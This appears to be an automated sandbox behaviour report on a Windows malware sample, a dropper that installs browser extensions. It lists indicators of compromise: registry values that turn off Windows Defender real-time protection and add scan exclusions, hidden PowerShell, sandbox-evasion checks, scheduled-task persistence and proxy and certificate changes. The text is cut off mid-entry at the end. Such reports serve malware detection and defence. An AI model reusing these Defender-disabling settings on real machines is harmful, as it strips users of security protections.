Analysis
-
max time kernel
208s -
max time network
210s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04-07-2024 22:41
Static task
static1
Behavioral task
behavioral1
Sample
9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe
Resource
win7-20240221-en
General
-
Target
9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe
-
Size
7.3MB
-
MD5
90cdfc989bff2ecad48617b8ada584f8
-
SHA1
bd33032987809fb736ca5ccccef6eb0d8706b394
-
SHA256
9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde
-
SHA512
f45da00c847f18670de92578e18f8988feaeafd397998fda82a962516bd061832c8149fd4caa54562a7b47e47588944f10d9c8da7fa813be23ee9a6b4a949059
-
SSDEEP
196608:91OAK7vjvwksw9S6AtAgeCYNLFn0+eVW+4toIj:3OHHbX9JgexLGr74toIj
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BRUhuLZnBvQZvqVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kwkuzFKVqEUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wEnnazEvJNiU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BRUhuLZnBvQZvqVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kwkuzFKVqEUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\namDtuGKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HLXmrCVreZSIQHdBR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\sFyaDrJXZzAeWCdu = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bgwuTdWixDdNC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bgwuTdWixDdNC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\namDtuGKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wEnnazEvJNiU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 1936 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 284 powershell.EXE 1264 powershell.EXE 1544 powershell.exe 2296 powershell.EXE 2136 powershell.exe 2264 powershell.exe 2564 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation BlxWeZd.exe -
Executes dropped EXE 4 IoCs
pid Process 2728 Install.exe 2532 Install.exe 400 UmWJAVg.exe 2636 BlxWeZd.exe -
Loads dropped DLL 23 IoCs
pid Process 2340 9810636e5c4e26fa19a3f1ce39f3844d044d499e18d9e672080c185d5cab7dde.exe 2728 Install.exe 2728 Install.exe 2728 Install.exe 2728 Install.exe 2532 Install.exe 2532 Install.exe 2532 Install.exe 780 WerFault.exe 780 WerFault.exe 780 WerFault.exe 1936 rundll32.exe 1936 rundll32.exe 1936 rundll32.exe 1936 rundll32.exe 2072 WerFault.exe 2072 WerFault.exe 2072 WerFault.exe 2072 WerFault.exe 2072 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json BlxWeZd.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json BlxWeZd.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BlxWeZd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 BlxWeZd.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UmWJAVg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 BlxWeZd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UmWJAVg.exe File created C:\Windows\system32\GroupPolicy\gpt.ini UmWJAVg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UmWJAVg.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 BlxWeZd.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 BlxWeZd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 BlxWeZd.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\WkdiDXR.dll BlxWeZd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi BlxWeZd.exe File created C:\Program Files (x86)\namDtuGKU\AwDTDEC.xml BlxWeZd.exe File created C:\Program Files (x86)\wEnnazEvJNiU2\sJylIXRNKdtOJ.dll BlxWeZd.exe File created C:\Program Files (x86)\namDtuGKU\JlXNdO.dll BlxWeZd.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak BlxWeZd.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\jVDLGVx.dll BlxWeZd.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi BlxWeZd.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja BlxWeZd.exe File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\jkIVRre.xml BlxWeZd.exe File created C:\Program Files (x86)\wEnnazEvJNiU2\onKGMDP.xml BlxWeZd.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\GDomnjv.xml BlxWeZd.exe File created C:\Program Files (x86)\kwkuzFKVqEUn\CHLasPQ.dll BlxWeZd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bsqNJSiTyoMLfdbIdy.job schtasks.exe File created C:\Windows\Tasks\KdMGsZYUagVlNoZLt.job schtasks.exe File created C:\Windows\Tasks\jRbEfcGJuWiRduS.job schtasks.exe File created C:\Windows\Tasks\kPVQaxkVtdiJeIOQR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 780 400 WerFault.exe 39 2072 2532 WerFault.exe 29 1332 2636 WerFault.exe 185 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" UmWJAVg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D48F5A0-6789-48DD-A812-7B788F50D9BA}\WpadDecisionReason = "1" BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs BlxWeZd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-5f-b0-80-bd-fd\WpadDecisionTime = a01db3ad63ceda01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs BlxWeZd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00df000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D48F5A0-6789-48DD-A812-7B788F50D9BA}\WpadDecisionTime = a01db3ad63ceda01 BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings BlxWeZd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix BlxWeZd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates BlxWeZd.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-5f-b0-80-bd-fd\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" UmWJAVg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-5f-b0-80-bd-fd\WpadDecisionReason = "1" BlxWeZd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-5f-b0-80-bd-fd\WpadDecisionTime = a01db3ad63ceda01 BlxWeZd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached UmWJAVg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-5f-b0-80-bd-fd\WpadDecision = "0" BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5D48F5A0-6789-48DD-A812-7B788F50D9BA}\WpadDecision = "0" BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates BlxWeZd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" BlxWeZd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 BlxWeZd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2884 schtasks.exe 1580 schtasks.exe 240 schtasks.exe 2984 schtasks.exe 2632 schtasks.exe 2548 schtasks.exe 2664 schtasks.exe 2620 schtasks.exe 1756 schtasks.exe 2560 schtasks.exe 1124 schtasks.exe 1584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2564 powershell.exe 284 powershell.EXE 284 powershell.EXE 284 powershell.EXE 1264 powershell.EXE 1264 powershell.EXE 1264 powershell.EXE 1544 powershell.exe 2296 powershell.EXE 2296 powershell.EXE 2296 powershell.EXE 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2136 powershell.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2264 powershell.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe 2636 BlxWeZd.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe Token: SeIncreaseQuotaPrivilege 2944 WMIC.exe Token: SeSecurityPrivilege 2944 WMIC.exe Token: SeTakeOwnershipPrivilege 2944 WMIC.exe Token: SeLoadDriverPrivilege 2944 WMIC.exe Token: SeSystemProfilePrivilege 2944 WMIC.exe Token: SeSystemtimePrivilege 2944 WMIC.exe Token: SeProfSingleProcessPrivilege 2944 WMIC.exe Token: SeIncBasePriorityPrivilege 2944 WMIC.exe Token: SeCreatePagefilePrivilege 2944 WMIC.exe Token: SeBackupPrivilege 2944 WMIC.exe Token: SeRestorePrivilege 2944 WMIC.exe Token: SeShutdownPrivilege 2944 WMIC.exe Token: SeDebugPrivilege 2944 WMIC.exe Token: SeSystemEnvironmentPrivilege 2944 WMIC.exe Token: SeRemoteShutdownPrivilege 2944 WMIC.exe Token: SeUndockPrivilege 2944 WMIC.exe Token: SeManageVolumePrivilege 2944 WMIC.exe Token: 33 2944 WMIC.exe Token: 34 2944 WMIC.exe Token: 35 2944 WMIC.exe Token: SeDebugPrivilege 284 powershell.EXE Token: SeDebugPrivilege 1264 powershell.EXE Token: SeDebugPrivilege 1544 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1532 WMIC.exe Token: SeIncreaseQuotaPrivilege 1532 WMIC.exe Token: SeSecurityPrivilege 1532 WMIC.exe Token: SeTakeOwnershipPrivilege 1532 WMIC.exe Token: SeLoadDriverPrivilege 1532 WMIC.exe Token: SeSystemtimePrivilege 1532 WMIC.exe Token: SeBackupPrivilege 1532 WMIC.exe Token: SeRestorePrivilege 1532 WMIC.exe Token: SeShutdownPrivilege 1532 WMIC.exe Token: SeSystemEnvironmentPrivilege 1532 WMIC.exe Token: SeUndockPrivilege 1532 WMIC.exe Token: SeManageVolumePrivilege 1532 WMIC.exe Token: SeDebugPrivilege 2296 powershell.EXE Token: SeDebugPrivilege 2136 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1224 WMIC.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeSecurityPrivilege 1224 WMIC.exe Token: SeTakeOwnershipPrivilege 1224 WMIC.exe Token: SeLoadDriverPrivilege 1224 WMIC.exe Token: SeSystemtimePrivilege 1224 WMIC.exe Token: SeBackupPrivilege 1224 WMIC.exe Token: SeRestorePrivilege 1224 WMIC.exe Token: SeShutdownPrivilege 1224 WMIC.exe Token: SeSystemEnvironmentPrivilege 1224 WMIC.exe Token: SeUndockPrivilege 1224 WMIC.exe Token: SeManageVolumePrivilege 1224 WMIC.exe Token: SeDebugPrivilege 2264 powershell.exe Token: 